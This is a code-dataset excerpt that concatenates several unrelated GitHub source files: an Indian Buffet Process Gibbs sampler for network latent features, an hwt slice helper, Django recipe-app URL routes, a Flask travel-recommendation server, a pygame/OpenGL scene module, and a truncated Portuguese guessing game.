post_summary['pc_in_ROPE'] = pc_in_ROPE\n ## Display the comparison value.\n if comp_val is not None:\n pc_gt_comp_val = round(100 * np.sum(sample > comp_val)/len(sample), roundto)\n pc_lt_comp_val = round(100 - pc_gt_comp_val, roundto)\n plt.axvline(comp_val, ymax=.75, color='g', linewidth=4, alpha=0.75,\n label='{:g}% < {:g} < {:g}%'.format(pc_lt_comp_val, \n comp_val, pc_gt_comp_val))\n post_summary['comp_val'] = comp_val\n post_summary['pc_gt_comp_val'] = pc_gt_comp_val\n plt.title('HPD of $\\alpha$')\n plt.legend(loc=0, framealpha=1)\n frame = plt.gca()\n frame.axes.get_yaxis().set_ticks([])\n return post_summary\n\ndef data_flag(data):\n n=np.shape(data)[0]\n flagi=np.zeros(n).astype(int)\n flagj=np.zeros(n).astype(int)\n flag=np.zeros(n).astype(int)\n singlevi=[]\n singlevj=[]\n for i in range(n):\n nz=np.nonzero(data[i,:])\n flagi[i]=np.shape(nz[0])[0]\n if flagi[i]==1:\n wv=sum(data[i,:])\n singlevi.append((i,wv))\n if wv<3:\n flagi[i]=0\n for i in range(n):\n nz=np.nonzero(data[:,i])\n flagj[i]=np.shape(nz[0])[0]\n if flagj[i]==1:\n wv=sum(data[:,i])\n singlevj.append((i,wv))\n if wv<3:\n flagj[i]=0\n flag[i]=max(flagi[i],flagj[i]) \n return flag,singlevi,singlevj\ndef clear_Z(Z,flag):\n n=np.shape(Z)[0]\n for i in range(n):\n if flag[i]==0:\n Z[i,:]=0\n return Z\ndef cal_totalEv(X):\n nonzero=np.nonzero(X) \n edge_num=np.shape(nonzero)[1]\n e_v=np.zeros(edge_num).astype(int)\n log_v=np.zeros(edge_num)\n for i in range(edge_num):\n V=e_v[i]=data[nonzero[0][i],nonzero[1][i]].astype(int)\n for j in range(V):\n log_v[i]+=np.log(j+1)\n return sum(e_v),sum(log_v),e_v\ndef cal_expo(X,Z,total_Ev,logTEV,e_v):\n nonzero=np.nonzero(X) \n edge_num=np.shape(nonzero)[1]\n expo=np.zeros(edge_num)\n log_expo=np.zeros(edge_num)\n log_default=np.log(1E-5) \n part1=0 \n for i in range(edge_num):\n expo[i]=sum(Z[nonzero[0][i],:]*Z[nonzero[1][i],:])\n# expoflag=0\n# expo_min=min(expo)\n# if expo_min<0:\n# print('expoflag_min')\n# expo+=np.abs(expo_min)\n# expoflag=1\n# for i in range(edge_num):\n if expo[i]!=0:\n log_expo[i]=np.log(expo[i])\n else:\n log_expo[i]=log_default \n part1+=e_v[i]*log_expo[i] \n \n return part1\n\ndef likelihood(X,Z,Rho,a,b,total_Ev,e_v,part2,part3,part4,part5):\n part1=cal_expo(X,Z,total_Ev,logTEV,e_v)\n Z=np.mat(Z)\n aa=np.dot(Z,Z.T)\n totalshareC=np.sum(np.reshape(aa,(aa.size,)))\n part6=(totalshareC+b)*Rho\n return part1-part2+part3+part5-part4-part6,totalshareC \n\ndef sampleIBP(alpha, num_objects): \n # Initializing storage for results\n result = np.zeros([num_objects, 1000]).astype(int)\n # Draw from the prior for alpha\n alpha_N=alpha/np.arange(1,num_objects+1)\n Knews = np.random.poisson(alpha_N)\n # Filling in first row of result matrix\n if Knews[0]==0:\n Knews[0]=1\n t=Knews[0]\n result[0, 0:t] = np.ones(t) #changed form np.ones([1, t])\n # Initializing K+\n K_plus = t\n for i in range(1, num_objects):\n for j in range(0, K_plus):\n mk=np.sum(result[0:i,j])\n nmk=i - mk\n logmk=1E-5\n lognmk=1E-5\n if mk!=0:\n logmk=np.log(mk)\n if nmk!=0:\n lognmk=np.log(nmk) \n p = np.array([logmk - np.log(i+1), \n lognmk - np.log(i+1)])\n p = np.exp(p - max(p))\n if(np.random.uniform(0,1) < p[0]/np.sum(p)):\n result[i, j] = 1\n else:\n result[i, j] = 0\n t = Knews[i]\n x = K_plus + 1\n y = K_plus + t\n result[i, (x-1):y] = np.ones(t) #changed form np.ones([1, t])\n K_plus = K_plus+t\n# print(\"---ff is:\",ff()-1)\n result = result[:, 0:K_plus]\n# for k in range(K_plus):\n# print(np.shape(np.nonzero(result[:,k])[0]))\n return list([result, K_plus])\ndef 
cal_Pois(alpha,num_objects,maxNew): \n alphaN = alpha/num_objects\n pois = np.zeros(maxNew) \n for new in range(maxNew):\n pois[new] = new*np.log(alphaN) - alphaN - np.log(math.factorial(new))\n return pois\ndef Gibbs_z_a(flag,Z,data,num_objects,a,b,alpha,maxNew,Rho,total_Ev,e_v,part2,part3,part4,part5,pois):\n\n for i in range(0, num_objects):\n if flag[i]!=0:\n P=np.zeros(2) \n \n K_plus=np.shape(Z)[1]\n for k in range(K_plus):\n if (k>=K_plus):\n break\n if K_plus==1:\n break\n if np.sum(Z[:,k])-Z[i,k]==0:\n # print('--------------------------------------merged---------%d++++'% e)\n Z[:, k:(K_plus - 1)] = Z[:, (k+1):K_plus]\n \n K_plus = K_plus - 1\n Z = Z[:, 0:K_plus]\n continue\n Z[i,k] = 0\n [lik,_] = likelihood(data,Z,Rho,a,b,total_Ev,e_v,part2,part3,part4,part5)\n P[0] = lik + np.log(num_objects-np.sum(Z[:,k])) - np.log(num_objects)\n Z[i,k] = 1\n [lik,_] = likelihood(data,Z,Rho,a,b,total_Ev,e_v,part2,part3,part4,part5) \n P[1] = lik + np.log(np.sum(Z[:,k])- 1) - np.log(num_objects)\n P = np.exp(P - max(P))\n U = np.random.uniform(0,1)\n if U<(P[1]/(np.sum(P))):\n Z[i,k] = 1\n else:\n Z[i,k] = 0 \n #Sample number of new features\n prob = np.zeros(maxNew)\n lik = np.zeros(maxNew)\n Tsc=np.zeros(maxNew)\n \n for new in range(maxNew): # consider adding up to maxNew-1 new features\n ZZ = Z \n if new>0:\n newcol = np.zeros((num_objects, new)).astype(int)\n newcol[i,:] = 1 \n ZZ = np.column_stack((ZZ, newcol))\n #Calculate the probability of kNew new features for object i\n \n [ll,tsc]=likelihood(data,ZZ,Rho,a,b,total_Ev,e_v,part2,part3,part4,part5) \n lik[new] =ll\n Tsc[new] =tsc\n prob[new] = pois[new] + ll\n #normalize prob and select the most likely number of new features\n prob = np.exp(prob - max(prob))\n prob = prob/sum(prob)\n U = np.random.uniform(0,1,1)\n p = 0\n kNew=0\n for new in range(maxNew):\n p = p+prob[new]\n if U<p:\n kNew=new\n break\n if kNew>0:\n \n newcol = np.zeros((num_objects, kNew)).astype(int)\n newcol[i,:] = 1 \n Z = np.column_stack((Z, newcol))\n K_plus = K_plus + kNew\n loglk= lik[kNew]\n totalshareC=Tsc[kNew]\n return Z,loglk,totalshareC\n\ndef harmi(num_objects):\n HN = 0\n for i in range(0, num_objects):\n HN = HN + 1/(i+1)\n return HN \n \ndef simulateNetwork(Z,Rho):\n N=np.shape(Z)[0]\n data=np.zeros((N,N)).astype(int)\n for i in range(N):\n for j in range(N-i):\n if i!=j:\n rho=sum(Z[i,:]*Z[j,:])*Rho\n# print(rho)\n data[i,j]=np.random.poisson(rho)\n# data[j,i]=data[i,j]\n# print(data)\n# st=input(\"continu\")\n return data\ndef tune_Z(Z):\n K_plus=np.shape(Z)[1]\n out=np.zeros(np.shape(Z)).astype(int)\n i=0 \n for k in range(K_plus):\n if (k>=K_plus):\n break\n if K_plus==1:\n break\n if np.sum(Z[:,k])>2:\n out[:,i]=Z[:,k]\n i+=1\n out = out[:,0:i]\n return out\ndef hpd(post):\n# sns.distplot(post)\n figsize(10.5, 3)\n HDP=np.percentile(post,[2.5,97.5])\n plt.plot(HDP,[0,0],label='HDP{:.2f}{:.2f}'.format(*HDP),linewidth=8,color='k')\n plt.legend(fontsize=16)\n plt.xlabel(r'$\\alpha$',fontsize=14)\n plt.gca().axes.get_yaxis().set_ticks([])\n plt.show()\ndef network_from_csv(csvfile):\n d = pd.read_csv(csvfile, usecols=['Source', 'Target', 'Weight'])\n d=np.array(d)\n n=d.shape[0]\n data=np.zeros((n,n)).astype(int) \n for i in range(1,n):\n data[d[i,0],d[i,1]]=d[i,2]\n return data \ndef summary_K(chain_K):\n k1=chain_K>1\n k2=k1*chain_K\n k2=k2.astype(int)\n k3=set(k2)\n k4=list(k3)\n if np.shape(k4)[0]>1:\n k4.pop(k4[0])\n zz=[]\n kk=[]\n a_f=[]\n kmaxl=0\n for _ in list(k4):\n temp=np.where(k2==_)[0]\n kk.append(temp)\n if np.shape(temp)[0]>kmaxl:\n kmaxl=np.shape(temp)[0]\n kmax=temp\n kkk=_\n times=0\n 
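# kmax holds the sampler iterations of the most frequent K; collect the\n # corresponding Z matrices and alpha draws for that mode\n 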
for i in list(kmax):\n zz.append(chain_Z[i])\n a_f.append(chain_alpha[i])\n times=times+1\n return times,kmax,zz,a_f,kkk\ndef plot_histo(chain_ks,chain_K,chain_alpha,chain_Rho):\n figsize(10.5, 16)\n ax = plt.subplot(411)\n ax.set_autoscaley_on(False)\n plt.title(\"Posterior distributions of K_plus and alpha\") \n plt.xlim([1,50])\n plt.xlabel(\"K_plus value\")\n plt.ylabel(\"Density\")\n plt.hist(chain_ks, histtype='stepfilled', bins=30, alpha=0.85,\n label=\"posterior of K_s\", color=\"#A60628\", normed=True)\n plt.legend(loc=\"upper right\") \n ax = plt.subplot(412)\n ax.set_autoscaley_on(False)\n plt.title(\"Posterior distributions of K_plus and alpha\") \n plt.xlim([1,50])\n plt.xlabel(\"K_plus value\")\n plt.ylabel(\"Density\")\n plt.hist(chain_K, histtype='stepfilled', bins=30, alpha=0.85,\n label=\"posterior of K_plus\", color=\"#A60628\", normed=True)\n plt.legend(loc=\"upper right\") \n ax = plt.subplot(413)\n ax.set_autoscaley_on(False)\n plt.xlim([0.1,6.6])\n plt.xlabel(\"alpha value\")\n plt.ylabel(\"Density\")\n plt.hist(chain_alpha, histtype='stepfilled', bins=30, alpha=0.85,\n label=\"posterior of alpha\", color=\"#467821\", normed=True)\n plt.legend(loc=\"upper right\")\n ax = plt.subplot(414)\n ax.set_autoscaley_on(False)\n plt.xlim([0.1,6.6])\n plt.xlabel(\"Rho value\")\n plt.ylabel(\"Density\")\n plt.hist(chain_Rho, histtype='stepfilled', bins=30, alpha=0.85,\n label=\"posterior of Rho\", color=\"#467821\", normed=True)\n plt.legend(loc=\"upper right\")\n plt.show()\ndef plot_scatter(chain_K,chain_alpha):\n figsize(16.5, 12)\n xValue = list(range(0, maxI)) \n yValue = chain_K[0:maxI] \n plt.xlabel('x-value') \n plt.ylabel('y-label') \n plt.scatter(xValue, yValue)\n plt.show()\n plt.figure('Line fig') \n xValue = list(range(0, maxI)) \n yValue = chain_K[0:maxI] \n ax = plt.gca() # set the x and y axis names \n ax.set_xlabel('x') \n ax.set_ylabel('y') # line plot: x_list values on the x axis, y_list values on the y axis # c sets the line color, linewidth the line width, alpha the transparency \n ax.plot(xValue, yValue, color='r', linewidth=1, alpha=0.6) \n plt.show()\n \n figsize(16.5, 12)\n xValue = list(range(0, maxI)) \n yValue = chain_alpha[0:maxI] \n plt.xlabel('x-value') \n plt.ylabel('y-label') \n plt.scatter(xValue, yValue)\n plt.show() \ndef graph_stat(X):\n nonzero=np.nonzero(X) \n edge_num=np.shape(nonzero)[1]\n e_v=np.zeros(edge_num).astype(int)\n for i in range(edge_num):\n e_v[i]=data[nonzero[0][i],nonzero[1][i]].astype(int) \n return edge_num,max(e_v),min(e_v),sum(e_v) \ndef write_graph(step,file,net,ZZ):\n nodeFlag=0\n N=np.shape(net)[0]\n K=np.shape(ZZ)[1]\n ct=str(N)+' '+str(K)+' '+str(step)\n file.write(ct)\n file.write(\" \\n \")\n for j in range(N):\n nb=np.nonzero(net[j])\n nbs=np.shape(nb)[1]\n nz=np.nonzero(ZZ[j])\n nzs=np.shape(nz)[1]\n if nbs>0:\n nodeFlag=1\n nbb=' '\n for nnb in nb[0]:\n ncb=str(nnb)+' '\n nbb=nbb+ncb\n if nzs>0:\n for nnz in nz[0]:\n ncz=str(nnz)+' '\n nbb=nbb+ncz\n else:\n nbb=' '\n content=str(nodeFlag)+' '+str(nbs)+nbb\n file.write(content)\n file.write(\" \\n\") \ndef write_mat(seed):\n for i in list(seed):\n ZZ=chain_Z[i]\n K=chain_K[i]\n Rho=chain_Rho[i]\n alpha=chain_alpha[i]\n net=simulateNetwork(ZZ,Rho)\n fn=str(K)+'.mat'\n scipy.io.savemat(fn,{'a':a,'b':b,'Rho':Rho,'alpha':alpha,'Z':ZZ,'net':net})\n# if chain_K[i]==6:\n# print('6----',i)\n# if chain_K[i]==7:\n# print('7----',i)\n# if chain_K[i]==8:\n# print('8----',i)\ndef plotl(d):\n figEx1=plt.figure(figsize=(4, 4))\n n, bins, patches = plt.hist(x=d, bins='auto', color='g',\n alpha=0.7, rwidth=0.85)\n plt.grid(axis='y', 
alpha=0.75)\n plt.xlabel('$\\lambda$ Value')\n plt.ylabel('Frequency')\n plt.title('Histogram of $\\lambda$')\n\n plt.grid(True)\n\n filename='K'\n plt.show()\n figEx1.savefig(filename+'.png')\n plt.close()\ndef plota(d):\n figEx2=plt.figure(figsize=(4, 4))\n n, bins, patches = plt.hist(x=d, bins='auto', color='b',\n alpha=0.7, rwidth=0.85)\n plt.grid(axis='y', alpha=0.75)\n plt.xlabel('alpha Value')\n plt.ylabel('Frequency')\n plt.title('Histogram of alpha')\n\n plt.grid(True)\n\n filename='K'\n plt.show()\n figEx2.savefig(filename+'.png')\n plt.close()\ndef plotk(d):\n figEx3=plt.figure(figsize=(4, 4))\n n, bins, patches = plt.hist(x=d, bins='auto', color='b',\n alpha=0.7, rwidth=0.85)\n plt.grid(axis='y', alpha=0.75)\n plt.xlabel('K Value')\n plt.ylabel('Frequency')\n plt.title('Histogram of $K_s$')\n\n plt.grid(True)\n\n filename='K'\n plt.show()\n figEx3.savefig(filename+'.png')\n plt.close()\ndef write_graphs(step,file,net,ZZ):\n nodeFlag=0\n N=np.shape(net)[0]\n K=np.shape(ZZ)[1]\n ct=str(N)+' '+str(K)+' '+str(step)\n\n file.write(ct)\n file.write(\" \\n \")\n net+=net.T\n for j in range(N):\n nodeFlag=0\n nb=np.nonzero(net[j])\n nbs=np.shape(nb)[1]\n nbb=' '\n if nbs>0:\n nodeFlag=1\n \n for nnb in nb[0]:\n ncb=str(nnb)\n nbb=nbb+' '+ncb\n for nnz in range(K):\n# print(ZZ[j,nnz])\n ncz=str(ZZ[j,nnz])\n nbb=nbb+' '+ncz\n\n if K==14:\n nbb=nbb+' '+str(0)+' '+str(0)\n if K==15:\n nbb=nbb+' '+str(0) \n if nbs==0:\n nbb='' \n content=str(nodeFlag)+' '+str(nbs)+nbb\n file.write(content)\n file.write(\" \\n\")\ndef counter():\n x=0\n def add():\n nonlocal x\n x+=1\n return x\n return add\ndef write_data(data,ZZZZ):\n f2n= 'originalGraph.txt'\n file=open(f2n,'a')\n N=np.shape(data)[0] \n \n ct=str(N)+' \\n'\n file.write(ct)\n for j in range(N):\n nodeFlag=0\n nb=np.nonzero(data[j])\n nbs=np.shape(nb)[1]\n \n \n K=np.shape(ZZZZ)[1]\n if nbs>0:\n nodeFlag=1\n nbb=' '\n for nnb in nb[0]:\n ncb=str(nnb)+' '\n nbb=nbb+ncb\n for nnz in range(K):\n# print(ZZ[j,nnz])\n ncz=str(ZZZZ[j,nnz])\n nbb=nbb+' '+ncz\n nbb=nbb+' '+str(0)\n\n content=str(nodeFlag)+' '+str(nbs)+nbb\n file.write(content)\n file.write(\" \\n\")\na=np.random.gamma(1,1)\nb=np.random.gamma(1,1)\n#mat=scipy.io.loadmat('yur.mat')\n#matr=scipy.io.loadmat('yu.mat')\n#a=mat['a']\n#b=mat['b']\n#alpha=mat['alpha']\n#data = np.loadtxt(\"eron_net.txt\", delimiter=\",\")\nRho = np.random.gamma(a,b)\n#Rho=mat['Rho']\n#Z=mat['ZZ']\n#data=mat['net']\ncsvfile='lesmis.csv'\ndata=network_from_csv(csvfile)\n#data=data+data.T\n[flag,svi,svj]=data_flag(data)\n#scipy.io.savemat('net.mat',{'net':net})\n#dataI=scipy.io.loadmat('net.mat')\nN=np.shape(data)[0]\n#N=30\nHN=harmi(N)\nalpha = np.random.gamma(24,1/(1+HN))\n[Z, K_plus] = sampleIBP(alpha, N)\nZ=clear_Z(Z,flag)\n#K_plus=np.shape(Z)[1]\nZZZ=tune_Z(Z)\nprint(ZZZ)\nst=input(\"continu\")\n#data=simulateNetwork(ZZZ,Rho)\nprint(data)\nst=input(\"continu\")\nnum_objects=np.shape(data)[0]\n#Set number of iterations\nmaxI = 10000\nBurnin =4000\ngNumber=maxI-Burnin\n[total_Ev,logTEV,e_v]=cal_totalEv(data)\n#Set truncation limit for max number of sampled latent features\n#Set storage arrays for sampled parameters\nchain_Z =[]\nchain_K = np.zeros(gNumber).astype(int)\nchain_alpha = np.zeros(gNumber)\nchain_Rho = np.zeros(gNumber)\n#Initialize parameter values\n#alpha = np.random.gamma(1,1/(1+HN))\n#[Z, K_plus] = sampleIBP(alpha, num_objects)\nloglkMax=-np.inf\nmaxNew=5\npois=cal_Pois(alpha,num_objects,maxNew)\npart2=logTEV\nchain_graphs=[]\npart4=gammaln(a)\npart5=a*np.log(b) 
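\n# part3 is consumed by likelihood() but is not defined above; the expression below\n# is an assumed form, taken from the Gamma(a, b) prior on Rho (it cancels in the\n# Gibbs ratios over Z, so any constant would also work)\npart3 = (total_Ev + a - 1)*np.log(Rho)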
\n[ne,maxe,mine,sume]=graph_stat(data)\nnowTime = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n#filename= 'save'+nowTime+'.txt'\n#f2= 'stat'+nowTime+'.txt'\nfilename= 'YU_l44.txt'\nfile=open(filename,'a')\n#file=open(f2,'a')\n#file.write(str(gNumber)+\" \\n\")\n#f2.write('*** '+str(ne)+' '+str(maxe)+' '+str(mine)+' '+str(sume)+\" \\n\")\n#nodeFlag=0\nchain_a= np.zeros(gNumber)\nchain_b= np.zeros(gNumber)\nchain_ks=[]\ntrueK=14\nc1=counter()\nc2=counter()\nc3=counter()\nfor step in range(0, maxI):\n [Z,loglk,totalshareC] = Gibbs_z_a(flag,Z,data,num_objects,a,b,alpha,maxNew,Rho,total_Ev,e_v,part2,part3,part4,part5,pois)\n K_plus=np.shape(Z)[1]\n ZZ=tune_Z(Z)\n K=np.shape(ZZ)[1]\n chain_ks.append(K)\n # conjugate Gamma draw for Rho; shape and rate match chain_a/chain_b recorded below\n Rho = np.random.gamma(total_Ev+a, 1/(totalshareC+b))\n part3 = (total_Ev+a-1)*np.log(Rho)\n if step>=Burnin:\n \n if K>0:\n chain_alpha[step-Burnin] = alpha\n chain_Rho[step-Burnin] = Rho\n chain_Z.append(ZZ)\n# chain_ll[step-Burnin] = loglk \n chain_K[step-Burnin]=K\n chain_a[step-Burnin] = total_Ev+a\n chain_b[step-Burnin] = totalshareC+b\n if K==trueK-1 or K==trueK or K==trueK+1:\n net=simulateNetwork(ZZ,Rho)\n## graph=adaj_network(net)\n# chain_graphs.append(net)\n# [ne,maxe,mine,sume]=graph_stat(net)\n# f2.write(str(step)+' '+str(ne)+' '+str(maxe)+' '+str(mine)+' '+str(sume)+\" \\n\")\n write_graph(step,file,net,ZZ)\n if K==trueK-1:\n c1()\n if K==trueK:\n c2()\n if K==trueK+1:\n c3()\n print(\"At iteration\", step, \": K is\", K, \", alpha is\", alpha)\n\n alpha = np.random.gamma(1 + K_plus, 1/(1+HN)) \n#def plot_line(data,start,end,filename):\n# figx=plt.figure(figsize=(16.5, 12))\n# plt.figure('Line fig') \n# xValue = list(range(start,end)) \n# yValue = data[start:end] \n# ax = plt.gca() # set the x and y axis names \n# ax.set_xlabel('iteration') \n# ax.set_ylabel('K') # line plot: x_list values on the x axis, y_list values on the y axis # c sets the line color, linewidth the line width, alpha the transparency \n# ax.plot(xValue, yValue, color='b', linewidth=1, alpha=0.6) \n# plt.show()\n# figx.savefig(filename+'.png')\n# plt.close() \n#file.close() \n#f2.close() \n#scipy.io.savemat('yu'+nowTime+'.mat',{'a':total_Ev+a,'b':totalshareC+b,'Rho':Rho,'alpha':alpha,'ZZ':ZZ,'net':net})\n#hpd(chain_alpha)\n#plot_histo(chain_ks,chain_K,chain_alpha,chain_Rho)\n#plot_scatter(chain_K,chain_alpha)\n#for k in range(times):\n# final_Z+=zz[k]\n#nowTime = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n#fn='lesmis.mat'\n#scipy.io.savemat(fn,{'a':a,'b':b,'r':chain_Rho,'alpha':chain_alpha,'Z':chain_Z,'net':chain_graphs})\n#final_Z=(final_Z>0).astype(int)\n#final_rho=final_rho/times\n#Z=chain_Z[-1]\n#[times,kmax,zz,a_f,kkk]=summary_K(chain_K)\n#Z_result=tune_Z(Z_result)\n#print(\"Finally: most K_plus is\", kkk,\"occur times: \",times, \"alpha is\", a_result)\n#print(\"Z is\",Z_result) \n#print(\"K_plus is\", np.shape(Z_result)[1])\nc13=c1()-1\nc23=c2()-1\nc33=c3()-1 \nfile.write('=== '+str(c13)+' '+str(c23)+' '+str(c33)+' '+str(c13+c23+c33)+\" \\n\")\nfile.close() \nplotk(chain_ks)\nplotl(chain_Rho)\n\n#dill.dump_session('yuseed.pkl')\nseed=[4978,4988,4990]\n#write_mat(seed)\ncc=chain_alpha\n\nplot_post2(cc, alpha=0.05, show_mode=True, kde_plot=True, bins=4, \n ROPE=[min(cc),max(cc)], comp_val=np.median(cc), roundto=2)\n#ccc=chain_Rho\n#\n#plot_post1(ccc, alpha=0.05, show_mode=True, kde_plot=True, bins=4, \n# ROPE=[min(ccc),max(ccc)], comp_val=np.median(ccc), roundto=2)\n#plota(chain_alpha)","repo_name":"yucomputer2018/rILFM","sub_path":"myibp-uncollapsed-lesmis.py","file_name":"myibp-uncollapsed-lesmis.py","file_ext":"py","file_size_in_byte":29503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17414504265","text":"from hwt.doc_markers import internal\nfrom hwt.hdl.types.defs import INT, SLICE\nfrom hwt.hdl.types.slice import HSlice\nfrom hwt.hdl.types.typeCast import toHVal\n\n\n@internal\ndef 
slice_to_SLICE(sliceVals, width):\n \"\"\"convert python slice to value of SLICE hdl type\"\"\"\n if sliceVals.step is None:\n step = -1\n else:\n step = sliceVals.step\n\n start = sliceVals.start\n if start is None:\n start = INT.from_py(width)\n else:\n start = toHVal(start)\n\n stop = sliceVals.stop\n if stop is None:\n stop = INT.from_py(0)\n else:\n stop = toHVal(stop)\n\n v = slice(start, stop, step)\n return HSlice.getValueCls()(SLICE, v, 1)\n","repo_name":"Nic30/hwt","sub_path":"hwt/hdl/types/sliceUtils.py","file_name":"sliceUtils.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":188,"dataset":"github-code","pt":"48"} +{"seq_id":"13235150861","text":"# classwork\ndef grades():\n num = 0\n grade = 0\n\n holder = input(\"Enter Grade: \")\n while(holder != \"done\"):\n num += 1\n grade += int(holder)\n holder = input(\"Enter Grade: \")\n\n return grade / num\n\ndef squares():\n ans = []\n holder = []\n for i in range(1, 31):\n holder += [i]\n\n for i in holder[:6]:\n ans += [i ** 2]\n for i in holder[25:]:\n ans += [i ** 2]\n\n for i in ans:\n print(i)\n\ndef duplicate(l):\n ans = []\n for i in l:\n if ans.count(i) == 0:\n ans += [i]\n return ans\n\n# homework\ndef even(l):\n ans = []\n for i in l:\n if i % 2 == 0:\n ans += [i]\n return ans\n\n# challenge\ndef circle(l1, l2):\n dup = []\n if len(l1) > len(l2):\n holder = l1\n l1 = l2\n l2 = holder\n\n for i in range(len(l2)):\n if l1[0] == l2[i]:\n dup += [i]\n\n holder = []\n\n for i in dup:\n holder += [l2[i:] + l2[:i]]\n\n l1 = (l1 * (int(len(l2) / len(l1)))) + l1[:len(l2) % len(l1)]\n\n ans = False\n\n for i in holder:\n if i == l1:\n return True\n\n return False\n","repo_name":"aaaronhsu/MKS22QA","sub_path":"Unit 2 - Strings and Lists/3_9listsAgain.py","file_name":"3_9listsAgain.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1036875046","text":"from django.urls import path\n\nfrom jedzonko.views import IndexView, RecipeListView, DashboardView, RecipeCreateView, PlanListView, PlanCreateView, \\\n ReceipeDetailView, PlanDetailView, SchedulesMealCreateView, IngredientsCreateView, IngredientsListView, \\\n RecipeUpdate, PlanUpdate, IngredientUpdate, RecipeDeleteView, PlanDeleteView, SchedulesMealCDelete\n\nurlpatterns = [\n path('', IndexView.as_view(), name='home'),\n path('recipe/list', RecipeListView.as_view(), name='recipe_list'),\n path('main', DashboardView.as_view(), name='dashbord'),\n path('recipe/add/', RecipeCreateView.as_view(), name='add_recipe'),\n path('plan/list', PlanListView.as_view(), name='plan_list'),\n path('plan/add/', PlanCreateView.as_view(), name='add_plan'),\n path('recipe/<int:pk>/', ReceipeDetailView.as_view(), name='recipe_details'),\n path('plan/<int:pk>/', PlanDetailView.as_view(), name='plan_details'),\n path('plan/add-recipe/', SchedulesMealCreateView.as_view(), name='add-plan-recipe'),\n path('ingredient/add/', IngredientsCreateView.as_view(), name='add_ingredient'),\n path('ingredient/', IngredientsListView.as_view(), name='ingredient'),\n path('recipe/modify/<int:pk>/', RecipeUpdate.as_view(), name='update_recipe'),\n path('plan/modify/<int:pk>/', PlanUpdate.as_view(), name='update_plan'),\n path('ingredient/modify/<int:pk>/', IngredientUpdate.as_view(), name='update_ingredient'),\n path('recipe/del/<int:pk>/', RecipeDeleteView.as_view(), name='delete_recipe'),\n path('plan/del/<int:pk>/', PlanDeleteView.as_view(), name='delete_plan'),\n path('plan_recipe/del/<int:pk>/', 
SchedulesMealCDelete.as_view(), name='delete_schedules'),\n\n\n]\n\n","repo_name":"Jacek960/Recipe-book","sub_path":"jedzonko/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74003706385","text":"from flask import Flask, render_template, jsonify, request\nfrom pymongo import MongoClient\nfrom datetime import datetime, timedelta as t\nfrom functions import schedule, parsing, recommend\n\n\napp = Flask(__name__)\n\nclient = MongoClient('mongodb://test:test@localhost', 27017)\n# client = MongoClient('localhost', 27017)\ndb = client.dbhomework\n\n\n## Serve the HTML page\n@app.route('/')\ndef homework():\n return render_template('index.html')\n\n\n# Save (POST) API\n@app.route('/add', methods=['POST'])\ndef add_place():\n word = request.form['word']\n places_info = []\n parsing.parsing(0, word, places_info)\n\n address = places_info[0]['address']\n name = places_info[0]['name']\n place_info = {\n 'name': name,\n 'address': address,\n 'word': word\n }\n\n return jsonify({'place_info': place_info, 'msg': '저장 완료'})\n\n# Route recommendation API\n@app.route('/recommend', methods=['POST'])\ndef recommend_():\n\n places = []\n for _, value in request.form.items():\n places.append(value)\n\n start_day = datetime(2022, 4, 14, 0, 0, 0)\n start_time = start_day + t(hours=10)\n add_place_index = [1, 1, 1, 1]\n\n # List holding the information of the travel places\n places_info = []\n dists, route = recommend.dists_and_route(places, places_info)\n total_route = schedule.schedule(places, places_info, start_day, start_time, dists, route, add_place_index)\n\n return jsonify({'total_route': total_route, 'msg': '추천 완료'})\n\n\n# View order list (Read) API\n@app.route('/show', methods=['GET'])\ndef view_orders():\n\n orders = list(db.orders2.find({}, {'_id': False}))\n\n return jsonify({'orders': orders,'msg': '주문 조회 완료'})\n\n\nif __name__ == '__main__':\n app.run('0.0.0.0', port=5000, debug=True)","repo_name":"kimphysicsman/Travel_recommedation","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33422180623","text":"import pygame\nfrom pygame.locals import *\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\n\n\nclass Scene:\n\n def __init__(self, window_size=[500, 500]):\n self.window = pygame.display.set_mode(\n window_size, HWSURFACE | OPENGL | DOUBLEBUF\n )\n glViewport(0, 0, window_size[0], window_size[1])\n glShadeModel(GL_SMOOTH)\n glHint(GL_PERSPECTIVE_CORRECTION_HINT, GL_NICEST)\n viewport = glGetIntegerv(GL_VIEWPORT)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n gluPerspective(\n 60.0,\n float(viewport[2]) / float(viewport[3]),\n 0.1,\n 1000.0\n )\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n\n def Get_Window(self):\n return self.window\n\n\ndef init():\n global scene\n scene = Scene()\n\n\ndef Get():\n try:\n return scene\n except:\n init()\n return scene\n\n\ndef Draw(points):\n for p in points:\n glClear(GL_COLOR_BUFFER_BIT)\n glBegin(GL_POINTS)\n # glVertex3i is the three-component integer vertex call\n glVertex3i(int(p[0]), int(p[1]), int(p[2]))\n glEnd()\n","repo_name":"Izzette/rmd","sub_path":"scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71824830226","text":"# Game: Guess the number\nimport random\nimport time\n\nprint('='*10,'Adivinhação','='*10)\nn = random.randint(0,5)\njog = 
